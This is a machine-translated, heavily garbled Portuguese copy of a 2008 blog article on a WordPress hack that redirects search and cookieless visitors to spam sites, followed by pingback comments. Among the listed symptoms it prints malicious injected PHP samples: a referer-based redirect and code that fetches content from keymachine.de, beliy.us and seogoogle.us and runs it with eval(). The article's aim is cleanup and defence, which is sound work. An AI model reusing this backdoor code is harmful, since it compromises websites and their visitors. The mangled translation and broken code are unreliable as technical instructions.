WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Redirecionar a Seu-Needs.info, AnyResults.Net, Áureo-Info.net e Outro Ilegal Sítios
Picaretas estão indo completamente a sendeiro e bravura WordPress blogs hospedaria por todo a Web, planta e injeção malicioso código em WordPress código e banco de dados para redirecionar visitantes e sucessos de Google e outro engenhos de pesquisa a spam sítios tal seu-needs.info, anyresults.net, áureo-info.net, keymachine.de, beliy.us, seogoogle.us e muita outro spam sítios que recheado com pagamento- por- clique CPC anúncios. Algum sendeiro aparece a destino maior afluência by redirecionando tudo sem WordPress biscoito. Sem estado picareta, estes tráfego suposto atingir às blog como destino.
Sintomas da Engenho de pesquisa Redirecionamento Sendeiro
Nota que nem todas sintomas poderá acontecer ao todo. Lá pode ser mais do que um método de cortes existência, qual contribuir a diferente encontrando e possível resolução.
- Qualquer clique através de engenhos de pesquisa tal Google, Yahoo, AOL, MSN, Janela Viva procura resultados, inculsivo blog nome, estará redirecionar e despachante a picaretas’ sítios tal seu-needs.info, anyresults.net, áureo-info.net, keymachine.de, beliy.us, seogoogle.us, com a lista seguro crescer. Espectador chega às picareta página com a mesmo procura enfiar que ele ou ela costumava procura em engenho de pesquisa.
- Clique numa ligação à blog em RSS alimentos leitor tal Google leitor pode ser redirecionar a picareta sítio também.
- Uma visita sem quaisquer conta ao blog, ou não lógica ( disso faz não possui biscoito detectar by malicioso código), estará redirecionar a spam sítios.
- Somente visita de engenho de pesquisa são estado redirecionar embora, e o truque manejar a asno por volta provavelmente grande quantidade bloggers, webmasters e sítio titulares, ou pelo menos alongamento a identificação da problema.
- Rápida grande e dramático pingo e lose de maciço monta de visitantes tráfego e página vistas em teia cão de caça estatística, especialmente tráfego com Google como referida a, se bem que engenho de pesquisa resultados classificação é intacto.
- Macio pingo de anunciar proveito de Google AdSense ou outro anúncios rede, ou afiliado comissões.
- A seguinte base cifrado PHP código poderá aparecer ao wp-blog-header.php arquivo:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ como $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falso){ $ser1=”?;brecha; }
se && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);saída; }? > - Uma imagem, qual é de fato um molho de malicioso PHP código, foi adicionada à wp- conteúdos/ retirar uma mensagem no computador diretório. Por exemplo, wp- conteúdos/ retirar uma mensagem no computador/2008/06/06/abcdefghijklmn.jpg, ou pode ser dentro seu tema capa para encadernação, i.e. wp-contents/themes/classic/images/xyz.jpg. O nome da imagem pode ser na formato de xxxxxx_old.jpeg.
- Uma introdução foi embutido em MySQL banco de dados for WordPress wp_options para ativar a imagem ( o malicioso PHP código) como um plugue, tipicamente como rss_f541b3abd05e7962fcab37737f40fad8.
- Lá pode ser também malicioso código, especialmente essas que interpretar com avaliar() ou base64_decode() comando estado embutido em outro WordPress PHP arquivos. Exemplos são os seguintes códigos:
ifisset_GET'p'(($[])) {
$coturno = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ coturno, ‘ obter http:/km20725.keymachine.de/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ coturno, ‘ hospedeiro: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ coturno));
$contente = implorar(”, $ contente);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ coturno);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress tema isto é estado ativado e usado pode ser injetado com sendeiro código e afetada também. Tal código normalmente existe em header.php ou index.php da tema, e possui uma fila similar à abaixo
ifserâ€1″($== && sizeof_COOKIE0($)==){ headerâ€Location(:
O WordPress procura tráfego redirecionar a spam sítio sendeiro acontecer provavelmente devido a segurança antro e vulnerabilidade que não seja remendado quando blog titular decidir para não o fazer atualização a última versão de WordPress ( embora algumrelatórios que seu blogs estado picareta se bem que dela’ já ao última versão de WordPress 2.5.1). Qualquer que porquê, heresia’ o conserto e solução para resolver e derrota o corte para garantir que you próprio atrás os tráficos e evadir estado penalizar by Google by irracional redirecionando a spam páginas.
- Reforço o WordPress banco de dados.
- Uso phpMyAdmin a folhear um livro WordPress MySQL tabelas de base de dados. Encaminhar-se wp_options mesa, e em seguida editar a linha nomeada active_plugins. A linha miudezas tudo ativo plugue que tem sido ativado. Atravessar a lista ( num linha), e procurar um um plugue nomeada ultimado com uma imagem extensão, tal .jpg, .jpeg, .gif e etc. Por exemplo, abcdefgh_old.jpeg. Fichar o percurso à imagem arquivo.
- Usando sFTP ou SSH ( desaprender por volta FTP ou Telnet for segurança), então navegar à caminho do arquivo, e apagar o arquivo.
- Encaminhar-se WordPress Administrador Plugue painel, desativar ou atirar qualquer plugue a claro desliga o malicioso plugue da “active_plugins” linha.
- Atrás a phpMyAdmin, às wp_options mesa, arranjar um emprego linha que contém a seguinte enfiar como option_name:
rss_f541b3abd05e7962fcab37737f40fad8Apagar a linha embora.
Se you dont’ conhecer como executar a base de dados limpeza especificado em passos acima, heresia’ um vídeo tutorial:
- Encaminhar-se wp_users mesa. Se há um anônimo usuário ( nulo valor em user_nicename campina) cirada at 000000:: em 0000-00-00, fichar o usuário IDENTIFICAÇÃO ( identificação campina, um número). Apagar o usuário.
- Folhear um livro o wp_usermeta mesa. Localizar tudo linhas com usuário fósforos o IDENTIFICAÇÃO da apagar ilegal usuário. Tem normalmente três linhas estado aliado à invasor usuário Identificação. Apagar tudo o aliado linhas.
- Lógica à servidor para editar o tema arquivos, ou folhear um livro o tema arquivos’ código em Tema Editor de WordPress Administrador Desenho painel. Confirmar o header.php e index.php for qualquer suspeito código. Como mencionada acima, procurar alguma coisa similar à linha abaixo:
ifserâ€1″($== && sizeof_COOKIE0($)==){ headerâ€Location(:Se encontrado, apagar e remover o código. Repare que o malicioso código estará vária linhas longa em total.
- Se dela’ não já existência, criar um vazia index.html arquivo na wp- conteúdos/ plugue diretório. O vazia index.html couros os teores da plugue diretório, efetivamente protetor what plugue-ins estado usado de picaretas a empedernir e apertar o WordPress segurança.
- Retirar uma mensagem no computador e substituir todos WordPress arquivos ( até wp-blog-header.php) ao servidor com a fresca, limpeza, e originalúltima versão de WordPress (pois sim, exceto poucos arquivos tal wp-config.php e temas). Se seu’ aprimoramento, lido oguia cuidadosamente.
- Alteração seu senha.
- Se tiver múltipla usuários, alteração seu senha ( ou pedir as senhoras pedirem alteração o código secreto) também.
importante: Isto é um máquina traduzida página qual é fornecida " como é" sem garantia. Máquina tradução pode ser difícil comprender. Por favor recorrer aoriginal Inglês artigo sempre que possível.
Parte e contribuir ou obter suporte técnico e ajuda at My Digital Vida Fóruns.
Relacionado Artigos
- Adicionar NoFollow Relacionamento a WordPress Blogroll incrementar Mensageiro
- WordPress Plugue: Visualização Google Analítica e FeedBurner Relatórios Estatística de Sítio Admin
- Technorati Recebida Ligações Plugue for WordPress
- Uma olhadela At Google Mercador Procura
- Como evitar, Desvio ou Escapada Google Caixa de areira
- Ask.com Engenho de pesquisa Crítica by CNNMoney
- Drive More Tráfego usando Imagens
- SEO Amigável Rescrever Método deslocar Teias URL De Subdiretório a Raíz Progenitor Capa para encadernação
- Integrar e visualizar Google AdSense for Procura e Co-Op Hábito Engenho de pesquisa Resulta em WordPress Blog Página Modelo
- Qual Engenho de pesquisa é o melhor e Muita Relevante?




Junho 12th, 2008 1006:
[...] My Digital Vida WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Repetir a discagem…[...]
Junho 12th, 2008 1114:
[...] wersja WP 2.5.1 była narażona na jakieś problema. UM w całym tym zamieszaniu, zwanym już Engenho de pesquisa Redirecionamento Sendeiro, chodzi o przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie [...]
Junho 12th, 2008 1443:
[...] WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Redirecionar a Seu-Nee… Parte ou Enviar This a amigas Esfera: Relacionado ContentWant more software para a Web críticas? Então certificar you subscrever a nossa RSS alimentos ou obter nossa personalizável pingente e incorporar a na sua sítio! Relacionado postes WordPress a mais usado aberto fonte blog software[...]
Junho 12th, 2008 1940:
[...] Kalau peringkat blog WordPress kita di Google tetap untuk palavra chave kita, gravando pengunjung turun drástico, odiando- odiando, bisa jadi itu artinya blog kita kena sendeiro dan di redirecionar ke situar spam. [...]
Junho 13th, 2008 1200:
[...] My Digital Vida WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Repetir a discagem…[...]
Junho 13th, 2008 1336:
[...] WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Redirecionar My Digital… WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Redirecionar a Seu-Needs.info, AnyResults.Net, Áureo-Info.net e Outro Ilegal Sítios » My Digital Vida ( etiquetas: wordpress segurança)[...]
Junho 18th, 2008 2208:
[...] My Digital Vida WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Repetir a discagem…[...]
Julho 3rd, 2008 0308:
[...] ca sa-mi dau semântico unde e buba, daca nu mi-ar fi spus Eugen intr-o disco la café, ca um gasit un ligação pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicação un alcachofra cu título : [...]
Julho 15th, 2008 0810:
[...] Eu apanhava a cedo em e feito seguro para retirar tudo o malicioso código Heis amável tutorial do modo como para limpar seu sítio se this foi acontecer a[...]
Julho 17th, 2008 1030:
[...] WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfego Redirecionar a Seu-Nee…. [...]
Julho 25th, 2008 0949:
[...] certificar una merda vir vencer tra le mania siete già estático infestar o canetas di essência, qui e qui troverete le específica dellexploit’ e alcuni consignar utili por[...]